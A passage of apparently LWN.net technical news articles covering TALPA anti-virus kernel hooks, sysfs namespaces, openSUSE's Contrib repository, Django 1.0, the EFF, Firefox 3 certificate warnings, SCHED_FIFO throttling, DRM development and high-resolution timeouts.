problematic at best, causing users to run kernels tainted with binary
modules.  With a threat model—however limited—in place, work
can proceed 
to find the right way to add this functionality into the kernel.


Paris is narrowing in on a design that
calls out to user space, both synchronously and asynchronously depending on
the operation.  File access might go something like this:

open() - causes interested user-space programs to be notified
asynchronously; anti-virus scanners might kick off a scan if needed
read()/mmap() - causes a synchronous user-space
notification, which 
allows anti-virus scanners to block access until scanning is complete; if
malware is found, cause the read/mmap to return an error
write() - whenever the modification time (mtime) of a file is
updated, asynchronously notify user space; this would allow anti-virus
scanners to re-scan the data as desired
close() - asynchronous user-space notification; another place
where anti-virus scanners could re-scan if the file has been dirtied


Where and how to store the current scanning status of a file is still an
open question.  Various proposals have been discussed, starting with a
non-persistent flag in the in-memory inode of a file.  While simple, that
would cause a lot of unnecessary additional scanning as inodes drop out
of the cache.  Persistent storage of the scanned status of a file
alleviates that problem, but runs into another: how do you handle multiple
anti-virus products (or, more generally, scanners of various sorts); whose
status gets stored with the inode?


For this reason, user-space scanners will need to keep their own database
of information about which inodes have been scanned.  For anti-virus
scanners, they will also want to keep information about which version of
the virus database was used.  Depending on the application, that
could be stored in extended attributes (xattrs) of the file or in some
other application-specific database.  In any case, it is not a problem for
the kernel, as Ted Ts'o points out:

I'm just arguing that there should be absolutely *no* support in the
kernel for solving this particular problem, since the question of
whether a file has been scanned with a particular version of the virus
DB is purely a userspace problem.


It is important to keep the scanned status out of kernel purview in order
to ensure that policy decisions are not handled by the kernel itself.  This
is in keeping with the longstanding kernel development principle that user
space should make all policy decisions.  This allows new applications to
come along, ones that were perhaps never envisioned when the feature was
being designed.  For example, Alan Cox describes another reason that the state of the
file with respect to scanning should be kept in user space:

This is another application layer matter. At the end of the day why does
the kernel care where this data is kept. For all we know someone might
want to centralise it or even distribute it between nodes on a clustered
file system.


The latest TALPA design includes an in-memory clean/dirty flag that can
short circuit the blocking read notification (when clean).  That flag gets
set to dirty whenever there is an mtime modification.  This optimizes the
common case of reading a file that hasn't changed.  Further optimizations
are possible down the line as Paris mentions:

If some general xattr namespace is agreed upon for such a thing someday
a patch may be acceptable to clear that namespace on mtime update, but I
don't plan to do that at this time since comparing the timestamp in the
xattr vs mtime should be good enough.


Various other uses for the kinds of hooks proposed for TALPA have also come up
in the discussion. Hierarchical storage management, where data is
transparently moved between different kinds of media, might be able to use
the blocking read mechanism. File indexing applications and intrusion
detection systems could use the mtime change notification as well.  This is
a perfect example of kernel development in action; after a rough start,
the TALPA folks have done a much better job working with the
community. 


Some might argue that the kernel development process is somehow suboptimal,
but it is the only way to get things into Linux.  As the earlier adventures
of TALPA would indicate, flouting kernel tradition is likely to go
nowhere.  While it is still a long way from being included—pesky
things like working code are still needed—it is clearly on a path to
get there some day, in one form or another.


		Sysfs and namespaces


Support for network namespaces - allowing different groups of processes to
have a different view of the system's network interfaces, routes, firewall
rules, etc. - is nearing completion in recent kernels.  A look at
net/Kconfig turns up something interesting, though: network
namespaces can only be enabled in kernels which do not support sysfs - the
two are mutually exclusive.  Since most system configurations need sysfs to
work properly, this limitation has made it harder than it would otherwise
be to use, or even test, the network namespace feature.

The problem is simple: the network subsystem creates a sysfs directory for
each network interface on the system.  For example, eth0 is
represented by /sys/class/net/eth0; therein one can find out just
about anything about how eth0 is configured, query its packet
statistics, and more.  But, when network namespaces are in use, one group
of processes may have a different eth0 than another, so they
cannot share a globally-accessible sysfs tree.  One solution might be to
add the network namespace as an explicit level in the sysfs tree, but that
would break user-space tools and fails to properly isolate namespaces from
each other.  The real solution is to build namespace awareness more deeply
into sysfs.


Eric Biederman has been working on a set of sysfs namespace patches for the
last year or so; those patches now appear to be getting close to ready for
inclusion into the mainline.  Network namespaces will be the first user of
this feature, but it has been written in a way that makes it possible for
any system namespace to provide differing views of parts of the sysfs
hierarchy.


The core concept is that of a "tagged" directory in sysfs.  Any sysfs
directory can be associated with (at most) one type of tag, where that type
identifies which type of namespace controls how that directory is viewed.
Thus, for example, /sys/class/net would have a tag type
identifying the network namespace subsystem as the one which is in control
there.  The /sys/kernel/uids directory, instead, will be managed
by the user namespace subsystem.
Once a directory is given a tag type, all subdirectories and
attribute files inherit the same type.

Namespace code makes use of tagged sysfs directories by adding an entry to
enum sysfs_tag_type, defined in &lt;linux/sysfs.h&gt;, to
identify its specific tag type.
The namespace must also create an operations structure:


The purpose of the mount_tag() method is to return a specific tag
(represented by a void * pointer) for the current
process.  This tag, normally, will just be a pointer to the structure
describing the relevant namespace; for example, network namespaces
implement this method as follows:


The tag operations must be registered with sysfs using:


Thereafter, there are two ways of associating tags with a sysfs hierarchy.
One of those is to make a tagged directory directly with:


The directory associated with kobj will have differing contents
depending on the value of the tag of the given type.  The actual
tag associated with the contents of this directory will be determined (at
creation time) by calling a new function added to the kobj_type
structure:


The sysfs_tag() function is usually a short series of
container_of() calls which, eventually, locates the appropriate
namespace for the given kobj.

An alternative way to attach tags to a directory tree is to associate it
directly with the class structure.  To that end, struct
class has two new members:


When the class is instantiated, it will have tags of the given
tag_type; the specific tag for a given class will be found by
calling the sysfs_tag() function.

Finally, if a specific tag ceases to be valid (because the associated
namespace is destroyed, normally), a call should be made to:


This call will cause all sysfs directories with the given tag to
become invisible, and to be deleted when it is safe to do so.

Adding tagged directory support requires some significant changes to the
sysfs code.  But the interface has been designed to make it very easy for
other subsystems to make use of tagged directories; it's a simple matter of
providing functions to return the specific tag values which should be
used.  At this point, the biggest challenge might be making sense of sysfs
when its contents may be different for each observer.  But that is a
challenge associated with namespaces in general.

		A new "contrib" repository for openSUSE


There has been a recent discussion on the opensuse-factory mailing list
about the creation of a repository for non-core packages. The concern
expressed at the beginning of the discussion is that openSUSE has too many
repositories of unknown quality.  Right now many openSUSE community
members have home repositories with software packages not found in the
main openSUSE repository.  Some have software that other openSUSE users
would like, some have highly experimental packages that most users would
rather avoid.  It is difficult for the user to find the packages they want,
or know which ones they might find suitable. Pascal
Bleser expressed some of those concerns:


The goal of the contrib repository must indeed be "stability", which
essentially means two things:
- - feature freeze: when the Factory repository is freezed, the contrib
repository must be freezed too; only allow bugfix upgrades (as, clearly,
I doubt we'd find enough human resources to backport fixes) and reject
feature upgrades
- - stable software: packages that are in there need a lot of testing and
must hence be picked carefully

The point is to make an "additional" type of repository,
not an "always the latest".

And then we should think about how to have those packages tested
properly in order to gain an acceptable level of quality in there when
openSUSE distro releases happen (or, rather, when they're freezed).
Following the alpha/beta/RC cycles of Factory and issue the same calls
for testing could be an option.


Alexey
Eromenko had some ideas of what that might look like:


Yes, "Contrib" is planned to be a community-driven extension of Factory,
with all Factory  standards and limits applied.

This means, that user's will have early version of contrib available
for 11.1. "early" doesn't mean unstable, but it means that number of
packages are expected to be limited.

Only stable software will make it into contrib.
All unstable software will remain in user's Home projects in OBS.


Pascal
Bleser wondered about how a package is determined to be stable.


Yes, sure, but =&gt; "after it becomes stable" &lt;=
That's precisely the point. How do we decide whether a package is stable
enough to go into contrib ?
Through a release management team ?
But maybe we need to offer a comfortable way for people to test packages
before they make it into contrib, and having a staging repository is one
way of doing it.
(I'm just throwing ideas, I'm not saying it's necessarily _the_ way to
do it)


Richard
Guenther proposed some sort of staging repository.


It as well makes sense to stage Contrib (I would like this for Factory,
too, but it's probably easiest to try with Contrib first). If you
are familiar with the Debian way then you know there is the unstable
and the testing repositories. So there should be something like
Contrib:/Unstable (feel free to pick a more suitable name) where
a new package (version) should reside for some time before it is
migrated to the main Contrib repository. Criterias ideally would be
"zero bugs of severity greater than normal" - but of course this
would require proper bugzilla integration (or completely manual
migration).

Staging Contrib helps getting more peer review and avoids breaking
Contrib itself. At the point the next openSUSE is freezed development
can continue in the unstable branch but only critical fixes are
migrated to Contrib.


Alexey
Eromenko that the new repository should have stable versioned branches,
but unstable packages should remain in Home repositories.


Speaking about stable/unstable trees:
-I think that stable must have braches, yes, (contrib-stable-11.1,
contrib-stable-11.2, etc...) - but only for future releases, not
backports.
Reason is simple: We will find BETA-testers for 11.1/11.2, but
unlikely to find enough testers for packages for 10.2.

-unstable: I prefer this branch should exists in user's OBS, but if
there are volunteers,
it could be part of contrib. Because it is unstable, I don't think it
needs branching.


The discussion continued from there.  For now unstable packages remain the
the user's Home repository and a small review team has been formed to
review these potential candidates.  The discussion, and results have been
documented on the Contrib
wiki page, along with a wish list of packages, for those who
are interested in learning more about the Contrib repository and the shape
it might take.

		Django nears 1.0 milestone


The Django web application
framework is nearing an important milestone: version 1.0.  Like Ruby on
Rails, TurboGears, and others, Django is meant to streamline 
application development for the web by providing easy-to-use libraries for
tasks that 
are commonly performed by dynamic web sites, such as database access and
HTML templating.  The Django project has just released
the second beta of the 1.0 release, with the final release due in early
September. 


Django is Python-based, with an eye towards getting an application—or
the beginnings of one—up and running quickly.  The framework is quite
"Pythonic", so it will be very accessible to those used to programming in
that language.  Django also has an extensive set of
documentation including an on-line (and dead tree) book. 


While Django can be used to build nearly any kind of web site, it has a
"sweet spot" that is well described in the introduction to The
Django Book:

Because Django was born in a news environment, it offers several features
(particularly its admin interface, covered in Chapter 6) that are
particularly well suited for "content" sites – sites like eBay,
craigslist.org, and washingtonpost.com that offer dynamic, database-driven
information. (Don't let that turn you off, though – although Django is
particularly good for developing those sorts of sites, that doesn't
preclude it from being an effective tool for building any sort of dynamic
Web site. There's a difference between being particularly effective at
something and being ineffective at other things.)


The database abstraction (or model) layer is at the heart of what Django
provides to a programmer.  Most dynamic web sites use some kind of
database, so Django supports multiple, popular database systems, of both free
software and commercial varieties.  Because the model layer is a high-level
description of the data, moving from one database backend to another is
greatly simplified.  In addition, the flexibility of the model API means
that many applications can do all of the queries that they need without
ever descending into SQL—though the facility is there if it is needed.


An example taken from the book nicely illustrates the simplicity of
Django's model API:

From this information, along with some configuration concerning database
type and name, Django can generate and execute the appropriate SQL to build a
database table to store a Book.  As fields get added and removed from the
model, the proper commands to synchronize the model and the database can be
generated.  From application code (i.e. the "view" code), then, models can
be used in various ways, for instance:

This can then be used in an HTML template as follows:


That is, of course, a simple example, (and it lacks the URL mapping piece)
but it gives a flavor of the power 
that Django provides.  It is also an example that most folks, even
non-programmers, can follow to some extent.  Like many
model-view-controller (MVC) based frameworks, Django splits up the various
pieces of functionality in an attempt to break the coupling between the
user interface, "business" logic, and data storage, allowing each to be
worked on separately.  In particular, the template language is meant to be
used by web page designers who have little programming background. 


One of the nicer features is the automatically generated administrative
interface.  Many web frameworks have incorporated an easy way for a site
administrator to start entering data into their models.  This allows
developers to get their application running quickly with real data
without having to code up a bunch of tedious data entry forms.  One
of the bigger changes from the current 0.96 Django release and the upcoming
1.0 is a complete overhaul of this interface.


Many developers have been using the development versions of Django from the
subversion repository because the released version (which is what is
packaged by distributions) has lagged.  There are a number of
backward-incompatible changes since 0.96 and the documentation is geared
towards the 1.0 version (though it should be noted that versions for each
of the last two releases are also readily available).  Stabilizing the API
has been the driving force behind the 1.0 release.  Going forward,
compatibility will be maintained unless a security or other
serious problem is found.


Django has numerous other interesting features: authentication, session
handling, and a caching system
that is geared towards scalability.  It is also fully ready for 
internationalization, with "full support for multi-language
applications, letting you specify translation strings and providing hooks
for language-specific functionality." 


Due to be released on September 2, just in time for DjangoCon, 1.0 is, unsurprisingly, both
feature and "string" frozen—only serious bug fixes are still going
in.  Like other projects, including Python itself, Django is "governed" by
an independent foundation; 
the newly formed Django
Software Foundation in this case.  The original developers of Django are still
active both as foundation board members and as active developers (and
users) of Django.


There are lots of web frameworks to choose from, in nearly every computer
language used today—though none for COBOL as far as we have
heard—so Django is just "yet another" web framework at some level. 
Django does have some things going for it that others may lack: a
development community that is active and uses the framework (generally the
development version checked out of
the subversion repository) for live,
high-volume sites, excellent documentation, and a well thought-out design.
For anyone looking for a Python-based web application framework, at least
taking Django for a spin will be time well spent.


		EFF continues fight for rights and freedoms


There's little doubt that emerging technology is improving our way of
life, but it's also creating a quagmire of legal issues surrounding the
rights and restrictions we face while living in a digital age. The once
ambiguous concept of "digital rights" has now become an all-encompassing term
used to designate a wide range of rights that have the potential to be
trampled on as courts sort out how Constitutional freedom applies to
emerging and existing technologies.
LWN recently chronicled
GeekPAC, an organization looking for new ways   
to protect our rights via the political battlefront. The Electronic Frontier Foundation (EFF), one of
the oldest non-profit organizations dedicated to establishing and defending
our rights in a digital world, takes a different approach.  

Since the EFF's mission encompasses such a large body of issues, it's no
longer practical to say they're protecting "digital rights." Rebecca
Jeschke, Media Relations Coordinator for the EFF, says, "Instead, in our
increasingly networked world, they are simply 'rights.'  But we'll continue
to educate folks on the issues." To do so, the EFF focuses its
energies on 
several important issues including
free speech, intellectual property, privacy, and innovation. At first
blush, it may be easy to dismiss the work they do as something that only
applies to people who download music illegally or who need to protect their
online content from thieves. In fact, it may surprise some people to know
that the EFF also defends the privacy of airline travelers and cell phone
users, issues not typically associated with the purveyors of digital
freedoms. 

One of the reasons the EFF's reach is so wide is because of the way
technology infiltrates our everyday lives. It's easy to understand why
sharing the contents of a store-bought music CD with hundreds of people on
the Internet may infringe on the rights of the artist hoping to sell his
music. In the case of an airline traveler, rights infringement takes on a
completely new form when the Transportation Safety Administration's data
analysis and screening software wrongly decides someone is a security
risk. Not only is there no way to challenge the error, it's a mistake
that's likely to haunt them for the rest of their lives. 

The more pervasive technology becomes, the more stories of this nature
arise. Take, for example, the seemingly innocuous library
book. Many public and school libraries are employing RFID technology to track books
and other borrowed items. People throw these books into their bag or
backpack without realizing the affixed tracking tags can actually be used
to track 
them as well. It's doubtful the government would be interested in
the whereabouts of a 9-year old walking home from school, but it's easy to
see how this technology can be mishandled or abused. 

To be sure, no one is suggesting that technology be removed from our
daily lives. The mission of the EFF and its supporters is to effect
accountability and protect people's rights within the courts. 

Jeschke says one of the biggest battles surrounding digital freedom that
we're likely to hear about in the next year or so is the issue of coders'
rights. In response to a gradual uptick of cases in which coders, software
engineers, and computer science students are being falsely accused of
hacking and other nefarious crimes, the EFF has developed the Coders' Rights Project.  

According to the EFF, coders are becoming reluctant to explore and
research ways to make our technology safer for fear of being prosecuted
under laws like the Digital Millennium Copyright Act (DMCA) and the
Computer Fraud and Abuse Act. The Coders' Rights Project protects
researchers through "education, legal defense, amicus briefs and
involvement in the community with the goal of promoting innovation and
safeguarding the rights of curious tinkerers and hackers on the digital
frontier." 

Jeschke says another big issue to watch involves the National Security
Agency (NSA) and its interest in wiretapping phones and
email without first obtaining a court order. Though expressly illegal
since 1978, President George W. Bush authorized the NSA to proceed anyway
and when the news became public in 2005, the EFF immediately sprang into
action against the telecommunications companies assisting the government
with their illegal practice. Congress passed an amendment of the original
law that grants telecommunications companies immunity, and the EFF is
currently working to have 
that law repealed.  

Other issues of importance in the upcoming months are expected to be in
the area of copyright and fair 
use in user-generated content. The proliferation of YouTube and other
online video hosting sites are creating a new and exciting level of
creativity, along with some cinema screen-sized headaches about how content
owned by others is permitted to be used..   

For example, a homegrown animated video of original content is fine to
post online. Setting that video to a favorite Rolling Stones song, however,
crosses the line into copyright infringement. Or does it?  What if the main
character is simply wearing a t-shirt bearing the band's hand-drawn logo?
These are some of the issues the EFF is hoping to sort out.  

As a non-profit organization, the EFF is funded solely through
individual and corporate donations. In fact, a full two-thirds
of the foundation's operating budget comes from individual donations, much
of which is funneled directly into litigation. 

The EFF's status as a charitable organization does not permit the
solicitation of politicians and governmental figures to support its
cause. Instead, the foundation fights legal battles in court, advises
policymakers, and uses it's corps of 50,000 volunteers to educate the
public.   

One such EFF contributor is SourceForge.net Community Manager Ross Turk,
who has been donating consistently to the EFF for 3 years and has been a
staunch supporter for much longer.  He says:

I think the world is changing. Technology has made things possible now
that weren't possible before, but I think the system has become highly
motivated to preserve itself by making sure people don't do things in new
and interesting ways. The EFF's mission is, as I see it, to help the system
adapt to the world that we live in today by forcing it to take a closer
look at the way it deals with patents, the limitless power it grants
industry, and the way it views free speech in an online age. 

I like that they protect the world's innovators, and I like that they
thwart those who try to use the technology we have created to monitor and
control us.  I'm also very happy to know that they're
there to help us protect members of our community who are attacked for
doing what they like to do. 


Turk also notes that EFF
Bootcamp, a one day training session presented by the foundation's
attorneys has benefited him professionally because it helped him
"understand the difference between enforcement and oppression." 

It's precisely that kind of education that has kept the EFF going strong
for 18 years. The first step in protecting our rights in the burgeoning age
of technology is to understand how the things we invent and rely on have
the potential to impact our freedoms. 


		Firefox 3 SSL certificate warnings


Users of Firefox 3 have likely seen the new warnings for various
"invalid" SSL certificates.  Unlike earlier versions of Firefox, these new
warnings are much scarier, as well as more difficult to
ignore—clicking through to the web site is decidedly more time
consuming.  This is exactly as the Mozilla folks intend, but it has raised
some eyebrows, and ire, amongst site owners and Firefox users.


SSL certificates are used to enable encrypted communication (i.e. https)
between browsers and web sites.  Web site owners generate a public and
private key for use in the encryption. The public key gets wrapped up in an
X.509 certificate and must be signed by someone.  For larger sites, it is
typically a certificate authority (CA) that signs the certificate, but that
generally costs money.  Many smaller sites will sign their own certificate
creating what is known as a self-signed certificate


As part of the negotiation of an encrypted connection, a web site will
present its certificate to the browser.  In order to prevent
man-in-the-middle attacks against the encrypted connection, the browser
needs to verify that the certificate belongs to the web site it believes it
is talking to.  It does that by verifying the signature of the CA.


A signature can only be verified if the browser has the public key of the
CA that has signed the certificate.  Because there are a multitude of CAs,
a "web of trust" is established whereby a number of root CAs sign the
certificate of lesser CAs, who might in turn sign for other CAs.  A browser
developer, like Mozilla, chooses a set of root certificates that they
trust.  When verifying the certificate from some random website, the
browser follows the signature chain; if it reaches one of their root
certificates, the web site certificate is valid.  A self-signed certificate
will, of course, fail this test.


When a user comes across a site that has such a certificate, Firefox 3 puts
up a nasty warning.  The images that accompany this article are screenshots
of the warning, along with two of the three steps one must take to accept
the certificate.  They were generated by visiting https://bugzilla.gnome.org.  The days
of a single pop-up message that could easily be clicked through are long gone.


There are a few different issues here.  To start with, there are a large
number of legitimate sites that have self-signed certificates.  In order to
access those sites, users are being trained to click through a series of
dialogs and scary ("Legitimate banks, stores, and other public sites
will not ask you to do this") warnings, just as they were trained to
do with single pop-up message in earlier Firefox versions.


Mozilla's position
is that self-signed certificates are untrustworthy, not invalid
necessarily, but not something that the browser can trust without asking
the user.  Because most users are not very sophisticated, the warnings need
to be detailed and somewhat frightening.  The problem is that users of all
kinds may get annoyed by the dialogs—then train themselves to
essentially ignore them.


Because there are CAs, like StartSSL, that provide free certificate
signing (as well as others that cost less than $20/year), Mozilla is
clearly trying to push web sites into moving away from self signing.  There
is a risk of man-in-the-middle attacks from self-signed certificates
because anyone can create certificate that purports to be for any other
given web site.  To some extent, though, the level of danger depends on
what the encryption 
is trying to protect.


For sites that do e-commerce or transmit and receive sensitive information,
there is no question that a CA signed certificate is required.  There are
other reasons to encrypt traffic, though, including evading deep packet inspection (DPI), where
the risks of accepting a bogus certificate are relatively low.  One might
get ads 
injected into their web browser inappropriately—annoying, but hardly
fatal. 


There is no simple solution.  Mozilla is erring on the side of caution by
trying to protect its users while still allowing them to override its
protections.  Other techniques, possibly like the Perspectives
Firefox extension, may help alleviate the problem in the long term.  Until
then, we may have to just grit our teeth and click our way past the
multiple warnings.


		SCHED_FIFO and realtime throttling


The SCHED_FIFO scheduling class is a longstanding, POSIX-specified realtime
feature.  Processes in this class are given the CPU for as long as they
want it, subject only to the needs of higher-priority realtime
processes.  If there are two SCHED_FIFO processes with the same priority
contending for the CPU, the process which is currently running will
continue to do so until it decides to give the processor up.  SCHED_FIFO is
thus useful for realtime applications where one wants to know, with great
assurance, that the highest-priority process on the system will have full
access to the processor for as long as it needs it.

One of the many features merged back in the 2.6.25 cycle was realtime group
scheduling.  As a way of balancing CPU usage between competing groups of
processes, each 
of which can be running realtime tasks, the group scheduler introduced the
concept of "realtime bandwidth," or rt_bandwith.  This bandwidth consists
of a pair of values: a CPU time accounting period, and the amount of CPU
that the group is allowed to use - at realtime priority - during that
period.  Once a SCHED_FIFO task causes a group to exceed its rt_bandwidth,
it will be pushed out of the processor whether it wants to go or not.

This feature is required if one wants to allow multiple groups to split a
system's realtime processing power.  But it also turns out to have its uses in
the default situation, where all processes on the system are contained
within a single, default group.  Kernels
shipped since 2.6.25 have set the rt_bandwidth value for the default group
to be 0.95 out of every 1.0 seconds.  In other words, the group scheduler
is configured, by default, to reserve 5% of the CPU for non-SCHED_FIFO
tasks.


It seems that nobody really noticed this feature until mid-August, when
Peter Zijlstra posted a patch which set the
default value to "unlimited."  At that point it became clear that some
developers have a different idea about how this kind of policy should be
set than others do.

Ingo Molnar disagreed with the patch,
saying:


	The thing is, i got far more bugreports about locked up RT tasks
	where the lockup was unintentional, than real bugreports about
	anyone _intending_ for the whole box to come to a grinding halt
	because a high-prio RT tasks is monopolizing the CPU.


Ingo's suggestion was to raise the limit to ten seconds of CPU time.  As he
(and others) pointed out: any SCHED_FIFO application which needs to
monopolize the CPU for that long has serious problems and needs to be
fixed.

There are real problems associated with letting a SCHED_FIFO process run
indefinitely.  Should that process never get around to relinquishing the
CPU, the system will simply hang forevermore; there is no possibility of
the administrator slipping in with a kill command.  This process
will also block important things like kernel threads; even if it releases
the processor after ten seconds, it will have seriously degraded the
operation of the rest of the system.  Even on a multiprocessor system,
there will typically be processes bound to the CPU where the SCHED_FIFO
process is running; there will be no way to recover those processes without
breaking their CPU affinity, which is not a step anybody wants to take.

So, it is argued, the rt_bandwidth limit is an important safety breaker.
With it in place, even a runaway SCHED_FIFO cannot prevent the
administrator from (eventually) regaining control of the system and
figuring out what is going on.  In exchange for this safety, this feature
only robs SCHED_FIFO tasks of a small amount of CPU time - the equivalent
of running the application on a slightly weaker processor.

Those opposed to the default rt_bandwidth limit cite two main points: it is
a user-space API change (which also breaks POSIX compliance) and
represents an imposition of policy by the kernel.  On the first point, Nick
Piggin worries that this change could lead
to broken applications:


	It's not common sense to change this. It would be perfectly valid
	to engineer a realtime process that uses a peak of say 90% of the
	CPU with a 10% margin for safety and other services. Now they only
	have 5%.
	
	Or a realtime app could definitely use the CPU adaptively up to
	100% but still unable to tolerate an unexpected preemption.


What could make the problem worse is that the throttle might not cut in
during testing; it could, instead, wait until something unexpected comes up
in a production system.  Needless to say, that is a prospect which can
prove scary for people who create and deploy this kind of system.

The "policy in the kernel" argument was mostly shot down by Linus, who pointed out that
there's lots of policy in the kernel, especially when it comes to the
default settings of tunable parameters.  He says:


	And the default policy should generally be the one that makes sense
	for most people. Quite frankly, if it's an issue where all normal
	distros would basically be expected to set a value, then that value
	should _be_ the default policy, and none of the normal distros
	should ever need to worry.


Linus carefully avoided taking a position on which setting makes sense for
the most people here.  One could certainly argue that making systems
resistant to being taken over by runaway realtime processes is the more
sensible setting, especially considering that there is a certain amount of
interest in running scary applications like PulseAudio with realtime priority.
On the other hand, one can also make the case that conforming to the
standard (and expected) SCHED_FIFO semantics is the only option which makes
sense at all.

There has been
some talk of creating a new realtime scheduling class with throttling being
explicitly part of its semantics; this class could, with a suitably low
limit, even be made available to unprivileged processes.
Meanwhile, as of this writing, the 0.95-second limit - the one option that
nobody seems to like - remains unchanged.  It will almost certainly
be raised; how much is something we'll have to wait to see.

		DRI, BSD, and Linux


The Direct Rendering
Infrastructure project has long been working toward improved 3D
graphics support in free operating systems.  It is a crucial part of the
desktop Linux experience, but, thus far, DRI development has been done in
a relatively isolated manner.  Development process changes which have the potential
to make life better for Linux users are in the works, but, sometimes,
that's not the only thing that matters.


The DRI project makes its home at freedesktop.org.  Among other
things, the project maintains a set of git repositories representing
various views of the current state of DRI development (and the direct
rendering manager (DRM) work in particular).  This much is not unusual;
most Linux kernel subsystems have their own repository at this point.  The
DRM repository is different, though, in that it is not based on any Linux
kernel tree; it is, instead, an entirely separate line of development.


That separation is important; it means that its development is almost
entirely disconnected from mainline kernel development.  DRM patches going
into the kernel must be pulled out of the DRM tree and put into a form
suitable for merging, and any changes made within the kernel tree must be
carefully carried back to the DRM tree by hand.  So this work is not just
an out-of-tree project; it's an entirely separate project producing code
which is occasionally turned into a patch for the Linux kernel.  It is
not surprising that DRM and the mainline tend not to follow each other
well.  As Jesse
Barnes put it recently:


	Things are actually worse than I thought.  There are some fairly
	large differences between linux-core and upstream, some of which
	have been in linux-core for a long time.  It's one thing to have an
	out-of-tree development process but another entirely to let stuff
	rot for months &amp; years there.


The result of all this has been a lot of developer frustration, trouble getting code merged, concerns that the
project is hard for new developers to join, and more.  As the DRM
developers look to merge more significant chunks of code (GEM, for example), the pressure
for changes to the development process has been growing.
So Dave Airlie's recent announcement
of a proposed new DRM development process did not entirely come as a
surprise.  There are a number of changes being contemplated, but the core
ones are these:


 The DRM tree will be based on the mainline kernel, allowing for the 
     easy flow of patches in both directions.  The old tree will be no
     more.

 A more standard process for getting patches to the upstream kernel
     will be adopted; these will include standard techniques like topic
     branches and review of patches on the relevant mailing lists.

 Users of the DRM interface will not ship any releases depending on DRM
     features which are not yet present in the mainline kernel.


The result of all this, it is hoped, will be a development process which is
more efficient, more tightly coupled to the upstream kernel, and more
accessible for developers outside of the current "DRM cabal."  These are
all worthy objectives, but there may also be a cost associated with these
changes resulting from the unique role the DRI/DRM project has in the free
software community.


There is clearly a great deal of code shared between Linux and other free
operating systems, and with the BSD variants in particular.  But that
sharing tends not to happen at the kernel level.  The Linux kernel is vastly
different from anything BSD-derived, so moving code between them is never a
straightforward task.  GPL-licensed code is not welcome in
BSD-licensed kernels, naturally, making it hard for code move from Linux
to BSD even when it makes sense from a technical point of view.  When
code moves from BSD to Linux, it often brings a certain amount of acrimony 
with it.  So, while ideas can and do move freely, there is little sharing
of code between free kernels.


One significant exception is the DRM project, which is also used in most versions
of BSD.  One of the reasons behind the DRM project's current repository
organization is the facilitation of that cooperation; there are separate
directories for Linux code, BSD code, and code which is common to both.
Developers from all systems contribute to the code (though the BSD
developers are far outnumbered by their Linux counterparts), and they are
all able to use the code in their kernels.  When working in the common code
directory, developers know to be careful about not breaking other systems.
All told, it is a bit of welcome collaboration in an area where development
resources have tended to be in short supply - even if it benefits the BSD
side more than Linux.


Changing the organization of the DRM tree to be more directly based on
Linux seems unlikely to make life easier for the BSD developers.  Space for
BSD-specific code will remain available in the DRM repository, but turning
the "shared-code" directory into code in the Linux driver tree will make
its shared status less clear, and, thus, easier for Linux developers to
break on BSD.  Additionally, it seems clear that this code
may become more Linux-specific; Dave Airlie says:


	However I am sure that we will see more of a push towards using
	Linux constructs in dri drivers, things like idr, list.h, locking
	constructs are too much of a pain to reinvent for every driver.


Much of this functionality can be reproduced through compatibility layers
on the BSD side, but it must carry a bit of a second-class citizen feel.
Dave has, in fact, made that state of affairs clear:


	The thing is you can't expect equality, its just not possible,
	there are about 10-15 Linux developers, and 1 Free and 1 Open BSD
	developer working on DRM stuff at any one time, so you cannot
	expect the Linux developers to know what the BSD requirements are.


The fact that fewer people will be able to commit to the new repository -
in fact, it may be limited to Dave Airlie - also does not help.  So FreeBSD
developer Robert Noland, while calling this proposal "the most fair" of any
he has heard, is far from sure that he will
be able to work with it:


	I am having a really difficult time seeing what benefit I get from
	continuing to work in drm.git with this proposed model.  While all
	commits to master going through the mailing list, I don't
	anticipate that I have any veto power or even delay powers until I
	can at least prevent imports from breaking BSD.  Then once I do get
	it squared away, I'm still left having to send those to the ML and
	wait for approval to push the fixes.  I can just save myself that
	part of the hassle and work privately.  If I'm going to have to
	hand edit and merge every change, I don't see how it is really any
	harder to do that in my own repo, where I'm only subject to FreeBSD
	rules.


On the other hand, it's worth noting that OpenBSD developer Owain Ainsworth
already works in his own repository and seems
generally supportive of these changes.

Given the difference between the numbers of Linux-based
and BSD-based developers, it seems almost certain that a more
Linux-friendly process will win over.  There is one rumored change which
will not be happening, though: nobody is proposing to relicense the DRM
code to the GPL.  The DRM developers are only willing to support BSD to a
certain point, but they certainly are not looking to make life harder for
the BSD community.  So they will try to accommodate the BSD developers
while moving to a more Linux-centric development model; that is how things
are likely to go until such a time as the BSD community is able to bring
more developers to the party.

		High- (but not too high-) resolution timeouts


Linux provides a number of system calls that allow an application to wait
for file descriptors to become ready for I/O; they include
select(), pselect(), poll(), ppoll(),
and epoll_wait().  Each of these interfaces allows the
specification of a timeout putting an upper bound on how long the
application will be blocked.  In typical fashion, the form of that timeout
varies greatly.  poll() and epoll_wait() take an integer
number of milliseconds; select() takes a struct timeval
with microsecond resolution, and ppoll() and pselect()
take a struct timespec with nanosecond resolution.

They are all the same, though, in that they convert this timeout value to
jiffies, with a maximum resolution between one and ten milliseconds.  A
programmer might program a pselect() call with a
10 nanosecond timeout, but the call may not return until
10 milliseconds later, even in the absence of contention for the CPU.
An error of six orders of magnitude seems like a bit much, especially given
that contemporary hardware can easily support much more accurate timing.

Arjan van de Ven recently surfaced with a patch set aimed at addressing
this problem.  The core idea is simple: have the code implementing
poll() and select() use high-resolution timers instead of
converting the timeout period to low-resolution jiffies.  The
implementation relied on a new function to provide the timeouts:


Here, time is the timeout period, as interpreted by mode
(which is either HRTIMER_MODE_ABS or HRTIMER_MODE_REL).

High-resolution timeouts are a nice feature, but one can immediately
imagine a problem: higher-resolution timeouts are less likely to coincide
with other events which wake up the processor.  The result will be more
wakeups and greater power consumption.  As it happens, there are few
developers who are more aware of this fact than Arjan, who has done quite a
bit of work aimed at keeping processors asleep as much as possible.  His
solution to this problem was to only use high-resolution timeouts if the
timeout period is less than one second.  For longer timeout periods, the
old, jiffie-based mechanism was used as before.

Linus didn't like that solution, calling it
"ugly."  His preference, instead, was to have schedule_hrtimeout()
apply an appropriate amount of fuzz to all timeout values; the longer the
timeout, the less resolution would be supplied.  Alan Cox suggested that a better mechanism would be
for the caller to supply the required accuracy with the timeout value.  The
problem with that idea, as Linus pointed out, is that the current system
call interfaces provide no way for an application to supply the accuracy
value.  One could create more poll()-like system calls - as if
there weren't enough of them already - with an accuracy parameter, but that
looks like a lot of trouble to create a non-standard interface which few
programmers would bother to use.

